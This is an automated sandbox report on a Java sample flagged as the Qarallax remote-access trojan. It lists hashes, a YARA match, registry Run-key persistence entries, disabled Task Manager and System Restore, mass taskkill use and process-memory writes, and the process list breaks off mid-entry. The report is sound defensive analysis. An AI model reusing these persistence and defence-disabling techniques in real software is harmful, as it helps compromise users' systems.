Analysis
-
max time kernel
141s -
max time network
155s -
platform
windows7_x64 -
resource
win7 -
submitted
30/08/2020, 08:23
Static task
static1
Behavioral task
behavioral1
Sample
08028.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
08028.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
08028.jar
-
Size
403KB
-
MD5
805fada47d34674fac492573b6f01de8
-
SHA1
a796de518f1c7582485d80d5e3d1904a20e79a22
-
SHA256
fbfd10ddb1840f5f1deedc2067baca46c28a06078d9abea612a7948c75fcd352
-
SHA512
f3f5d5bf9aa312a527c770f37d97f09ee8322293db00a302bb56cce5e407df2d94ec19ffb87d176e5867870b882b93c57f8b64b67deda1586a8ac3dc4d012a99
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x000300000001352e-7.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 1116 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\VikxmIN = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hHEiU\\RAvDP.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\hHEiU\Desktop.ini java.exe File created C:\Users\Admin\hHEiU\Desktop.ini java.exe File opened for modification C:\Users\Admin\hHEiU\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\hHEiU\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\LtkvC java.exe File opened for modification C:\Windows\System32\LtkvC java.exe -
Kills process with taskkill 19 IoCs
pid Process 1400 taskkill.exe 1124 taskkill.exe 2020 taskkill.exe 1480 taskkill.exe 2028 taskkill.exe 616 taskkill.exe 1884 taskkill.exe 656 taskkill.exe 1708 taskkill.exe 1204 taskkill.exe 2032 taskkill.exe 936 taskkill.exe 744 taskkill.exe 1464 taskkill.exe 936 taskkill.exe 1956 taskkill.exe 1932 taskkill.exe 812 taskkill.exe 1584 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 656 powershell.exe 656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 100 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1976 WMIC.exe Token: SeSecurityPrivilege 1976 WMIC.exe Token: SeTakeOwnershipPrivilege 1976 WMIC.exe Token: SeLoadDriverPrivilege 1976 WMIC.exe Token: SeSystemProfilePrivilege 1976 WMIC.exe Token: SeSystemtimePrivilege 1976 WMIC.exe Token: SeProfSingleProcessPrivilege 1976 WMIC.exe Token: SeIncBasePriorityPrivilege 1976 WMIC.exe Token: SeCreatePagefilePrivilege 1976 WMIC.exe Token: SeBackupPrivilege 1976 WMIC.exe Token: SeRestorePrivilege 1976 WMIC.exe Token: SeShutdownPrivilege 1976 WMIC.exe Token: SeDebugPrivilege 1976 WMIC.exe Token: SeSystemEnvironmentPrivilege 1976 WMIC.exe Token: SeRemoteShutdownPrivilege 1976 WMIC.exe Token: SeUndockPrivilege 1976 WMIC.exe Token: SeManageVolumePrivilege 1976 WMIC.exe Token: 33 1976 WMIC.exe Token: 34 1976 WMIC.exe Token: 35 1976 WMIC.exe Token: SeIncreaseQuotaPrivilege 1976 WMIC.exe Token: SeSecurityPrivilege 1976 WMIC.exe Token: SeTakeOwnershipPrivilege 1976 WMIC.exe Token: SeLoadDriverPrivilege 1976 WMIC.exe Token: SeSystemProfilePrivilege 1976 WMIC.exe Token: SeSystemtimePrivilege 1976 WMIC.exe Token: SeProfSingleProcessPrivilege 1976 WMIC.exe Token: SeIncBasePriorityPrivilege 1976 WMIC.exe Token: SeCreatePagefilePrivilege 1976 WMIC.exe Token: SeBackupPrivilege 1976 WMIC.exe Token: SeRestorePrivilege 1976 WMIC.exe Token: SeShutdownPrivilege 1976 WMIC.exe Token: SeDebugPrivilege 1976 WMIC.exe Token: SeSystemEnvironmentPrivilege 1976 WMIC.exe Token: SeRemoteShutdownPrivilege 1976 WMIC.exe Token: SeUndockPrivilege 1976 WMIC.exe Token: SeManageVolumePrivilege 1976 WMIC.exe Token: 33 1976 WMIC.exe Token: 34 1976 WMIC.exe Token: 35 1976 WMIC.exe Token: SeIncreaseQuotaPrivilege 2008 WMIC.exe Token: SeSecurityPrivilege 2008 WMIC.exe Token: SeTakeOwnershipPrivilege 2008 WMIC.exe Token: SeLoadDriverPrivilege 2008 WMIC.exe Token: SeSystemProfilePrivilege 2008 WMIC.exe Token: SeSystemtimePrivilege 2008 WMIC.exe Token: SeProfSingleProcessPrivilege 2008 WMIC.exe Token: SeIncBasePriorityPrivilege 2008 WMIC.exe Token: SeCreatePagefilePrivilege 2008 WMIC.exe Token: SeBackupPrivilege 2008 WMIC.exe Token: SeRestorePrivilege 2008 WMIC.exe Token: SeShutdownPrivilege 2008 WMIC.exe Token: SeDebugPrivilege 2008 WMIC.exe Token: SeSystemEnvironmentPrivilege 2008 WMIC.exe Token: SeRemoteShutdownPrivilege 2008 WMIC.exe Token: SeUndockPrivilege 2008 WMIC.exe Token: SeManageVolumePrivilege 2008 WMIC.exe Token: 33 2008 WMIC.exe Token: 34 2008 WMIC.exe Token: 35 2008 WMIC.exe Token: SeIncreaseQuotaPrivilege 2008 WMIC.exe Token: SeSecurityPrivilege 2008 WMIC.exe Token: SeTakeOwnershipPrivilege 2008 WMIC.exe Token: SeLoadDriverPrivilege 2008 WMIC.exe Token: SeSystemProfilePrivilege 2008 WMIC.exe Token: SeSystemtimePrivilege 2008 WMIC.exe Token: SeProfSingleProcessPrivilege 2008 WMIC.exe Token: SeIncBasePriorityPrivilege 2008 WMIC.exe Token: SeCreatePagefilePrivilege 2008 WMIC.exe Token: SeBackupPrivilege 2008 WMIC.exe Token: SeRestorePrivilege 2008 WMIC.exe Token: SeShutdownPrivilege 2008 WMIC.exe Token: SeDebugPrivilege 2008 WMIC.exe Token: SeSystemEnvironmentPrivilege 2008 WMIC.exe Token: SeRemoteShutdownPrivilege 2008 WMIC.exe Token: SeUndockPrivilege 2008 WMIC.exe Token: SeManageVolumePrivilege 2008 WMIC.exe Token: 33 2008 WMIC.exe Token: 34 2008 WMIC.exe Token: 35 2008 WMIC.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 744 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 1204 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1884 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe Token: SeDebugPrivilege 1464 taskkill.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 1584 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 1124 taskkill.exe Token: SeDebugPrivilege 936 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe Token: SeDebugPrivilege 656 taskkill.exe Token: SeDebugPrivilege 2020 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1116 java.exe -
Suspicious use of WriteProcessMemory 798 IoCs
description pid Process procid_target PID 1116 wrote to memory of 1924 1116 java.exe 29 PID 1116 wrote to memory of 1924 1116 java.exe 29 PID 1116 wrote to memory of 1924 1116 java.exe 29 PID 1116 wrote to memory of 1952 1116 java.exe 30 PID 1116 wrote to memory of 1952 1116 java.exe 30 PID 1116 wrote to memory of 1952 1116 java.exe 30 PID 1952 wrote to memory of 1976 1952 cmd.exe 31 PID 1952 wrote to memory of 1976 1952 cmd.exe 31 PID 1952 wrote to memory of 1976 1952 cmd.exe 31 PID 1116 wrote to memory of 1932 1116 java.exe 32 PID 1116 wrote to memory of 1932 1116 java.exe 32 PID 1116 wrote to memory of 1932 1116 java.exe 32 PID 1932 wrote to memory of 2008 1932 cmd.exe 33 PID 1932 wrote to memory of 2008 1932 cmd.exe 33 PID 1932 wrote to memory of 2008 1932 cmd.exe 33 PID 1116 wrote to memory of 396 1116 java.exe 34 PID 1116 wrote to memory of 396 1116 java.exe 34 PID 1116 wrote to memory of 396 1116 java.exe 34 PID 1116 wrote to memory of 1124 1116 java.exe 35 PID 1116 wrote to memory of 1124 1116 java.exe 35 PID 1116 wrote to memory of 1124 1116 java.exe 35 PID 1116 wrote to memory of 796 1116 java.exe 36 PID 1116 wrote to memory of 796 1116 java.exe 36 PID 1116 wrote to memory of 796 1116 java.exe 36 PID 1116 wrote to memory of 1248 1116 java.exe 37 PID 1116 wrote to memory of 1248 1116 java.exe 37 PID 1116 wrote to memory of 1248 1116 java.exe 37 PID 1116 wrote to memory of 1224 1116 java.exe 38 PID 1116 wrote to memory of 1224 1116 java.exe 38 PID 1116 wrote to memory of 1224 1116 java.exe 38 PID 1116 wrote to memory of 792 1116 java.exe 39 PID 1116 wrote to memory of 792 1116 java.exe 39 PID 1116 wrote to memory of 792 1116 java.exe 39 PID 1116 wrote to memory of 536 1116 java.exe 40 PID 1116 wrote to memory of 536 1116 java.exe 40 PID 1116 wrote to memory of 536 1116 java.exe 40 PID 1116 wrote to memory of 684 1116 java.exe 41 PID 1116 wrote to memory of 684 1116 java.exe 41 PID 1116 wrote to memory of 684 1116 java.exe 41 PID 1116 wrote to memory of 1220 1116 java.exe 42 PID 1116 wrote to memory of 1220 1116 java.exe 42 PID 1116 wrote to memory of 1220 1116 java.exe 42 PID 1116 wrote to memory of 656 1116 java.exe 43 PID 1116 wrote to memory of 656 1116 java.exe 43 PID 1116 wrote to memory of 656 1116 java.exe 43 PID 1220 wrote to memory of 2028 1220 cmd.exe 45 PID 1220 wrote to memory of 2028 1220 cmd.exe 45 PID 1220 wrote to memory of 2028 1220 cmd.exe 45 PID 1116 wrote to memory of 848 1116 java.exe 46 PID 1116 wrote to memory of 848 1116 java.exe 46 PID 1116 wrote to memory of 848 1116 java.exe 46 PID 1116 wrote to memory of 2032 1116 java.exe 47 PID 1116 wrote to memory of 2032 1116 java.exe 47 PID 1116 wrote to memory of 2032 1116 java.exe 47 PID 1116 wrote to memory of 1480 1116 java.exe 48 PID 1116 wrote to memory of 1480 1116 java.exe 48 PID 1116 wrote to memory of 1480 1116 java.exe 48 PID 1220 wrote to memory of 1560 1220 cmd.exe 49 PID 1220 wrote to memory of 1560 1220 cmd.exe 49 PID 1220 wrote to memory of 1560 1220 cmd.exe 49 PID 1116 wrote to memory of 1984 1116 java.exe 51 PID 1116 wrote to memory of 1984 1116 java.exe 51 PID 1116 wrote to memory of 1984 1116 java.exe 51 PID 1116 wrote to memory of 1960 1116 java.exe 52 PID 1116 wrote to memory of 1960 1116 java.exe 52 PID 1116 wrote to memory of 1960 1116 java.exe 52 PID 1116 wrote to memory of 1892 1116 java.exe 55 PID 1116 wrote to memory of 1892 1116 java.exe 55 PID 1116 wrote to memory of 1892 1116 java.exe 55 PID 1116 wrote to memory of 744 1116 java.exe 56 PID 1116 wrote to memory of 744 1116 java.exe 56 PID 1116 wrote to memory of 744 1116 java.exe 56 PID 1116 wrote to memory of 328 1116 java.exe 57 PID 1116 wrote to memory of 328 1116 java.exe 57 PID 1116 wrote to memory of 328 1116 java.exe 57 PID 1116 wrote to memory of 972 1116 java.exe 61 PID 1116 wrote to memory of 972 1116 java.exe 61 PID 1116 wrote to memory of 972 1116 java.exe 61 PID 1116 wrote to memory of 524 1116 java.exe 63 PID 1116 wrote to memory of 524 1116 java.exe 63 PID 1116 wrote to memory of 524 1116 java.exe 63 PID 1116 wrote to memory of 2036 1116 java.exe 65 PID 1116 wrote to memory of 2036 1116 java.exe 65 PID 1116 wrote to memory of 2036 1116 java.exe 65 PID 1116 wrote to memory of 1436 1116 java.exe 66 PID 1116 wrote to memory of 1436 1116 java.exe 66 PID 1116 wrote to memory of 1436 1116 java.exe 66 PID 1892 wrote to memory of 2028 1892 cmd.exe 67 PID 1892 wrote to memory of 2028 1892 cmd.exe 67 PID 1892 wrote to memory of 2028 1892 cmd.exe 67 PID 1116 wrote to memory of 2008 1116 java.exe 70 PID 1116 wrote to memory of 2008 1116 java.exe 70 PID 1116 wrote to memory of 2008 1116 java.exe 70 PID 1116 wrote to memory of 2032 1116 java.exe 71 PID 1116 wrote to memory of 2032 1116 java.exe 71 PID 1116 wrote to memory of 2032 1116 java.exe 71 PID 1116 wrote to memory of 1012 1116 java.exe 74 PID 1116 wrote to memory of 1012 1116 java.exe 74 PID 1116 wrote to memory of 1012 1116 java.exe 74 PID 1116 wrote to memory of 1876 1116 java.exe 75 PID 1116 wrote to memory of 1876 1116 java.exe 75 PID 1116 wrote to memory of 1876 1116 java.exe 75 PID 1892 wrote to memory of 1940 1892 cmd.exe 77 PID 1892 wrote to memory of 1940 1892 cmd.exe 77 PID 1892 wrote to memory of 1940 1892 cmd.exe 77 PID 1116 wrote to memory of 1640 1116 java.exe 79 PID 1116 wrote to memory of 1640 1116 java.exe 79 PID 1116 wrote to memory of 1640 1116 java.exe 79 PID 1116 wrote to memory of 1648 1116 java.exe 81 PID 1116 wrote to memory of 1648 1116 java.exe 81 PID 1116 wrote to memory of 1648 1116 java.exe 81 PID 1116 wrote to memory of 744 1116 java.exe 82 PID 1116 wrote to memory of 744 1116 java.exe 82 PID 1116 wrote to memory of 744 1116 java.exe 82 PID 1116 wrote to memory of 812 1116 java.exe 85 PID 1116 wrote to memory of 812 1116 java.exe 85 PID 1116 wrote to memory of 812 1116 java.exe 85 PID 1116 wrote to memory of 1044 1116 java.exe 86 PID 1116 wrote to memory of 1044 1116 java.exe 86 PID 1116 wrote to memory of 1044 1116 java.exe 86 PID 1116 wrote to memory of 1436 1116 java.exe 87 PID 1116 wrote to memory of 1436 1116 java.exe 87 PID 1116 wrote to memory of 1436 1116 java.exe 87 PID 812 wrote to memory of 1964 812 cmd.exe 88 PID 812 wrote to memory of 1964 812 cmd.exe 88 PID 812 wrote to memory of 1964 812 cmd.exe 88 PID 1116 wrote to memory of 1960 1116 java.exe 91 PID 1116 wrote to memory of 1960 1116 java.exe 91 PID 1116 wrote to memory of 1960 1116 java.exe 91 PID 1116 wrote to memory of 848 1116 java.exe 93 PID 1116 wrote to memory of 848 1116 java.exe 93 PID 1116 wrote to memory of 848 1116 java.exe 93 PID 1116 wrote to memory of 276 1116 java.exe 95 PID 1116 wrote to memory of 276 1116 java.exe 95 PID 1116 wrote to memory of 276 1116 java.exe 95 PID 812 wrote to memory of 1556 812 cmd.exe 96 PID 812 wrote to memory of 1556 812 cmd.exe 96 PID 812 wrote to memory of 1556 812 cmd.exe 96 PID 1116 wrote to memory of 1076 1116 java.exe 97 PID 1116 wrote to memory of 1076 1116 java.exe 97 PID 1116 wrote to memory of 1076 1116 java.exe 97 PID 1116 wrote to memory of 1864 1116 java.exe 101 PID 1116 wrote to memory of 1864 1116 java.exe 101 PID 1116 wrote to memory of 1864 1116 java.exe 101 PID 1116 wrote to memory of 1948 1116 java.exe 102 PID 1116 wrote to memory of 1948 1116 java.exe 102 PID 1116 wrote to memory of 1948 1116 java.exe 102 PID 1116 wrote to memory of 332 1116 java.exe 104 PID 1116 wrote to memory of 332 1116 java.exe 104 PID 1116 wrote to memory of 332 1116 java.exe 104 PID 1116 wrote to memory of 924 1116 java.exe 105 PID 1116 wrote to memory of 924 1116 java.exe 105 PID 1116 wrote to memory of 924 1116 java.exe 105 PID 1116 wrote to memory of 1940 1116 java.exe 108 PID 1116 wrote to memory of 1940 1116 java.exe 108 PID 1116 wrote to memory of 1940 1116 java.exe 108 PID 1116 wrote to memory of 2004 1116 java.exe 106 PID 1116 wrote to memory of 2004 1116 java.exe 106 PID 1116 wrote to memory of 2004 1116 java.exe 106 PID 1116 wrote to memory of 972 1116 java.exe 113 PID 1116 wrote to memory of 972 1116 java.exe 113 PID 1116 wrote to memory of 972 1116 java.exe 113 PID 1116 wrote to memory of 2036 1116 java.exe 114 PID 1116 wrote to memory of 2036 1116 java.exe 114 PID 1116 wrote to memory of 2036 1116 java.exe 114 PID 2004 wrote to memory of 1640 2004 cmd.exe 116 PID 2004 wrote to memory of 1640 2004 cmd.exe 116 PID 2004 wrote to memory of 1640 2004 cmd.exe 116 PID 1116 wrote to memory of 2028 1116 java.exe 118 PID 1116 wrote to memory of 2028 1116 java.exe 118 PID 1116 wrote to memory of 2028 1116 java.exe 118 PID 1116 wrote to memory of 956 1116 java.exe 119 PID 1116 wrote to memory of 956 1116 java.exe 119 PID 1116 wrote to memory of 956 1116 java.exe 119 PID 2004 wrote to memory of 1620 2004 cmd.exe 120 PID 2004 wrote to memory of 1620 2004 cmd.exe 120 PID 2004 wrote to memory of 1620 2004 cmd.exe 120 PID 1116 wrote to memory of 1044 1116 java.exe 123 PID 1116 wrote to memory of 1044 1116 java.exe 123 PID 1116 wrote to memory of 1044 1116 java.exe 123 PID 1116 wrote to memory of 1224 1116 java.exe 124 PID 1116 wrote to memory of 1224 1116 java.exe 124 PID 1116 wrote to memory of 1224 1116 java.exe 124 PID 1116 wrote to memory of 684 1116 java.exe 125 PID 1116 wrote to memory of 684 1116 java.exe 125 PID 1116 wrote to memory of 684 1116 java.exe 125 PID 1224 wrote to memory of 1952 1224 cmd.exe 127 PID 1224 wrote to memory of 1952 1224 cmd.exe 127 PID 1224 wrote to memory of 1952 1224 cmd.exe 127 PID 1224 wrote to memory of 924 1224 cmd.exe 129 PID 1224 wrote to memory of 924 1224 cmd.exe 129 PID 1224 wrote to memory of 924 1224 cmd.exe 129 PID 1116 wrote to memory of 1560 1116 java.exe 130 PID 1116 wrote to memory of 1560 1116 java.exe 130 PID 1116 wrote to memory of 1560 1116 java.exe 130 PID 1560 wrote to memory of 1836 1560 cmd.exe 131 PID 1560 wrote to memory of 1836 1560 cmd.exe 131 PID 1560 wrote to memory of 1836 1560 cmd.exe 131 PID 1560 wrote to memory of 1620 1560 cmd.exe 132 PID 1560 wrote to memory of 1620 1560 cmd.exe 132 PID 1560 wrote to memory of 1620 1560 cmd.exe 132 PID 1116 wrote to memory of 1076 1116 java.exe 133 PID 1116 wrote to memory of 1076 1116 java.exe 133 PID 1116 wrote to memory of 1076 1116 java.exe 133 PID 1076 wrote to memory of 1940 1076 cmd.exe 134 PID 1076 wrote to memory of 1940 1076 cmd.exe 134 PID 1076 wrote to memory of 1940 1076 cmd.exe 134 PID 1076 wrote to memory of 1924 1076 cmd.exe 135 PID 1076 wrote to memory of 1924 1076 cmd.exe 135 PID 1076 wrote to memory of 1924 1076 cmd.exe 135 PID 1116 wrote to memory of 2036 1116 java.exe 136 PID 1116 wrote to memory of 2036 1116 java.exe 136 PID 1116 wrote to memory of 2036 1116 java.exe 136 PID 2036 wrote to memory of 1892 2036 cmd.exe 137 PID 2036 wrote to memory of 1892 2036 cmd.exe 137 PID 2036 wrote to memory of 1892 2036 cmd.exe 137 PID 2036 wrote to memory of 796 2036 cmd.exe 138 PID 2036 wrote to memory of 796 2036 cmd.exe 138 PID 2036 wrote to memory of 796 2036 cmd.exe 138 PID 1116 wrote to memory of 1708 1116 java.exe 139 PID 1116 wrote to memory of 1708 1116 java.exe 139 PID 1116 wrote to memory of 1708 1116 java.exe 139 PID 1116 wrote to memory of 936 1116 java.exe 141 PID 1116 wrote to memory of 936 1116 java.exe 141 PID 1116 wrote to memory of 936 1116 java.exe 141 PID 936 wrote to memory of 992 936 cmd.exe 142 PID 936 wrote to memory of 992 936 cmd.exe 142 PID 936 wrote to memory of 992 936 cmd.exe 142 PID 936 wrote to memory of 276 936 cmd.exe 143 PID 936 wrote to memory of 276 936 cmd.exe 143 PID 936 wrote to memory of 276 936 cmd.exe 143 PID 1116 wrote to memory of 1400 1116 java.exe 144 PID 1116 wrote to memory of 1400 1116 java.exe 144 PID 1116 wrote to memory of 1400 1116 java.exe 144 PID 1400 wrote to memory of 1488 1400 cmd.exe 145 PID 1400 wrote to memory of 1488 1400 cmd.exe 145 PID 1400 wrote to memory of 1488 1400 cmd.exe 145 PID 1400 wrote to memory of 1556 1400 cmd.exe 146 PID 1400 wrote to memory of 1556 1400 cmd.exe 146 PID 1400 wrote to memory of 1556 1400 cmd.exe 146 PID 1116 wrote to memory of 332 1116 java.exe 147 PID 1116 wrote to memory of 332 1116 java.exe 147 PID 1116 wrote to memory of 332 1116 java.exe 147 PID 332 wrote to memory of 432 332 cmd.exe 148 PID 332 wrote to memory of 432 332 cmd.exe 148 PID 332 wrote to memory of 432 332 cmd.exe 148 PID 332 wrote to memory of 524 332 cmd.exe 149 PID 332 wrote to memory of 524 332 cmd.exe 149 PID 332 wrote to memory of 524 332 cmd.exe 149 PID 1116 wrote to memory of 1232 1116 java.exe 150 PID 1116 wrote to memory of 1232 1116 java.exe 150 PID 1116 wrote to memory of 1232 1116 java.exe 150 PID 1232 wrote to memory of 276 1232 cmd.exe 151 PID 1232 wrote to memory of 276 1232 cmd.exe 151 PID 1232 wrote to memory of 276 1232 cmd.exe 151 PID 1232 wrote to memory of 396 1232 cmd.exe 152 PID 1232 wrote to memory of 396 1232 cmd.exe 152 PID 1232 wrote to memory of 396 1232 cmd.exe 152 PID 1116 wrote to memory of 1204 1116 java.exe 153 PID 1116 wrote to memory of 1204 1116 java.exe 153 PID 1116 wrote to memory of 1204 1116 java.exe 153 PID 1204 wrote to memory of 972 1204 cmd.exe 154 PID 1204 wrote to memory of 972 1204 cmd.exe 154 PID 1204 wrote to memory of 972 1204 cmd.exe 154 PID 1204 wrote to memory of 1584 1204 cmd.exe 155 PID 1204 wrote to memory of 1584 1204 cmd.exe 155 PID 1204 wrote to memory of 1584 1204 cmd.exe 155 PID 1116 wrote to memory of 2032 1116 java.exe 156 PID 1116 wrote to memory of 2032 1116 java.exe 156 PID 1116 wrote to memory of 2032 1116 java.exe 156 PID 1116 wrote to memory of 1932 1116 java.exe 157 PID 1116 wrote to memory of 1932 1116 java.exe 157 PID 1116 wrote to memory of 1932 1116 java.exe 157 PID 2032 wrote to memory of 824 2032 cmd.exe 159 PID 2032 wrote to memory of 824 2032 cmd.exe 159 PID 2032 wrote to memory of 824 2032 cmd.exe 159 PID 2032 wrote to memory of 1084 2032 cmd.exe 160 PID 2032 wrote to memory of 1084 2032 cmd.exe 160 PID 2032 wrote to memory of 1084 2032 cmd.exe 160 PID 1116 wrote to memory of 1480 1116 java.exe 161 PID 1116 wrote to memory of 1480 1116 java.exe 161 PID 1116 wrote to memory of 1480 1116 java.exe 161 PID 1480 wrote to memory of 1972 1480 cmd.exe 162 PID 1480 wrote to memory of 1972 1480 cmd.exe 162 PID 1480 wrote to memory of 1972 1480 cmd.exe 162 PID 1480 wrote to memory of 2028 1480 cmd.exe 163 PID 1480 wrote to memory of 2028 1480 cmd.exe 163 PID 1480 wrote to memory of 2028 1480 cmd.exe 163 PID 1116 wrote to memory of 924 1116 java.exe 164 PID 1116 wrote to memory of 924 1116 java.exe 164 PID 1116 wrote to memory of 924 1116 java.exe 164 PID 924 wrote to memory of 1556 924 cmd.exe 165 PID 924 wrote to memory of 1556 924 cmd.exe 165 PID 924 wrote to memory of 1556 924 cmd.exe 165 PID 924 wrote to memory of 1464 924 cmd.exe 166 PID 924 wrote to memory of 1464 924 cmd.exe 166 PID 924 wrote to memory of 1464 924 cmd.exe 166 PID 1116 wrote to memory of 432 1116 java.exe 167 PID 1116 wrote to memory of 432 1116 java.exe 167 PID 1116 wrote to memory of 432 1116 java.exe 167 PID 432 wrote to memory of 1248 432 cmd.exe 168 PID 432 wrote to memory of 1248 432 cmd.exe 168 PID 432 wrote to memory of 1248 432 cmd.exe 168 PID 432 wrote to memory of 276 432 cmd.exe 169 PID 432 wrote to memory of 276 432 cmd.exe 169 PID 432 wrote to memory of 276 432 cmd.exe 169 PID 1116 wrote to memory of 536 1116 java.exe 170 PID 1116 wrote to memory of 536 1116 java.exe 170 PID 1116 wrote to memory of 536 1116 java.exe 170 PID 536 wrote to memory of 1892 536 cmd.exe 171 PID 536 wrote to memory of 1892 536 cmd.exe 171 PID 536 wrote to memory of 1892 536 cmd.exe 171 PID 536 wrote to memory of 1140 536 cmd.exe 172 PID 536 wrote to memory of 1140 536 cmd.exe 172 PID 536 wrote to memory of 1140 536 cmd.exe 172 PID 1116 wrote to memory of 1068 1116 java.exe 173 PID 1116 wrote to memory of 1068 1116 java.exe 173 PID 1116 wrote to memory of 1068 1116 java.exe 173 PID 1068 wrote to memory of 824 1068 cmd.exe 174 PID 1068 wrote to memory of 824 1068 cmd.exe 174 PID 1068 wrote to memory of 824 1068 cmd.exe 174 PID 1068 wrote to memory of 1488 1068 cmd.exe 175 PID 1068 wrote to memory of 1488 1068 cmd.exe 175 PID 1068 wrote to memory of 1488 1068 cmd.exe 175 PID 1116 wrote to memory of 1884 1116 java.exe 176 PID 1116 wrote to memory of 1884 1116 java.exe 176 PID 1116 wrote to memory of 1884 1116 java.exe 176 PID 1884 wrote to memory of 1124 1884 cmd.exe 177 PID 1884 wrote to memory of 1124 1884 cmd.exe 177 PID 1884 wrote to memory of 1124 1884 cmd.exe 177 PID 1884 wrote to memory of 1944 1884 cmd.exe 178 PID 1884 wrote to memory of 1944 1884 cmd.exe 178 PID 1884 wrote to memory of 1944 1884 cmd.exe 178 PID 1116 wrote to memory of 1044 1116 java.exe 179 PID 1116 wrote to memory of 1044 1116 java.exe 179 PID 1116 wrote to memory of 1044 1116 java.exe 179 PID 1116 wrote to memory of 616 1116 java.exe 180 PID 1116 wrote to memory of 616 1116 java.exe 180 PID 1116 wrote to memory of 616 1116 java.exe 180 PID 1044 wrote to memory of 1932 1044 cmd.exe 181 PID 1044 wrote to memory of 1932 1044 cmd.exe 181 PID 1044 wrote to memory of 1932 1044 cmd.exe 181 PID 1044 wrote to memory of 932 1044 cmd.exe 183 PID 1044 wrote to memory of 932 1044 cmd.exe 183 PID 1044 wrote to memory of 932 1044 cmd.exe 183 PID 1116 wrote to memory of 276 1116 java.exe 184 PID 1116 wrote to memory of 276 1116 java.exe 184 PID 1116 wrote to memory of 276 1116 java.exe 184 PID 276 wrote to memory of 1892 276 cmd.exe 185 PID 276 wrote to memory of 1892 276 cmd.exe 185 PID 276 wrote to memory of 1892 276 cmd.exe 185 PID 276 wrote to memory of 1468 276 cmd.exe 186 PID 276 wrote to memory of 1468 276 cmd.exe 186 PID 276 wrote to memory of 1468 276 cmd.exe 186 PID 1116 wrote to memory of 1964 1116 java.exe 187 PID 1116 wrote to memory of 1964 1116 java.exe 187 PID 1116 wrote to memory of 1964 1116 java.exe 187 PID 1964 wrote to memory of 2016 1964 cmd.exe 188 PID 1964 wrote to memory of 2016 1964 cmd.exe 188 PID 1964 wrote to memory of 2016 1964 cmd.exe 188 PID 1964 wrote to memory of 1736 1964 cmd.exe 189 PID 1964 wrote to memory of 1736 1964 cmd.exe 189 PID 1964 wrote to memory of 1736 1964 cmd.exe 189 PID 1116 wrote to memory of 1940 1116 java.exe 190 PID 1116 wrote to memory of 1940 1116 java.exe 190 PID 1116 wrote to memory of 1940 1116 java.exe 190 PID 1940 wrote to memory of 1984 1940 cmd.exe 191 PID 1940 wrote to memory of 1984 1940 cmd.exe 191 PID 1940 wrote to memory of 1984 1940 cmd.exe 191 PID 1940 wrote to memory of 2028 1940 cmd.exe 192 PID 1940 wrote to memory of 2028 1940 cmd.exe 192 PID 1940 wrote to memory of 2028 1940 cmd.exe 192 PID 1116 wrote to memory of 824 1116 java.exe 193 PID 1116 wrote to memory of 824 1116 java.exe 193 PID 1116 wrote to memory of 824 1116 java.exe 193 PID 824 wrote to memory of 396 824 cmd.exe 194 PID 824 wrote to memory of 396 824 cmd.exe 194 PID 824 wrote to memory of 396 824 cmd.exe 194 PID 824 wrote to memory of 1900 824 cmd.exe 195 PID 824 wrote to memory of 1900 824 cmd.exe 195 PID 824 wrote to memory of 1900 824 cmd.exe 195 PID 1116 wrote to memory of 1944 1116 java.exe 196 PID 1116 wrote to memory of 1944 1116 java.exe 196 PID 1116 wrote to memory of 1944 1116 java.exe 196 PID 1944 wrote to memory of 1248 1944 cmd.exe 197 PID 1944 wrote to memory of 1248 1944 cmd.exe 197 PID 1944 wrote to memory of 1248 1944 cmd.exe 197 PID 1944 wrote to memory of 1884 1944 cmd.exe 198 PID 1944 wrote to memory of 1884 1944 cmd.exe 198 PID 1944 wrote to memory of 1884 1944 cmd.exe 198 PID 1116 wrote to memory of 1648 1116 java.exe 199 PID 1116 wrote to memory of 1648 1116 java.exe 199 PID 1116 wrote to memory of 1648 1116 java.exe 199 PID 1648 wrote to memory of 924 1648 cmd.exe 200 PID 1648 wrote to memory of 924 1648 cmd.exe 200 PID 1648 wrote to memory of 924 1648 cmd.exe 200 PID 1648 wrote to memory of 1996 1648 cmd.exe 201 PID 1648 wrote to memory of 1996 1648 cmd.exe 201 PID 1648 wrote to memory of 1996 1648 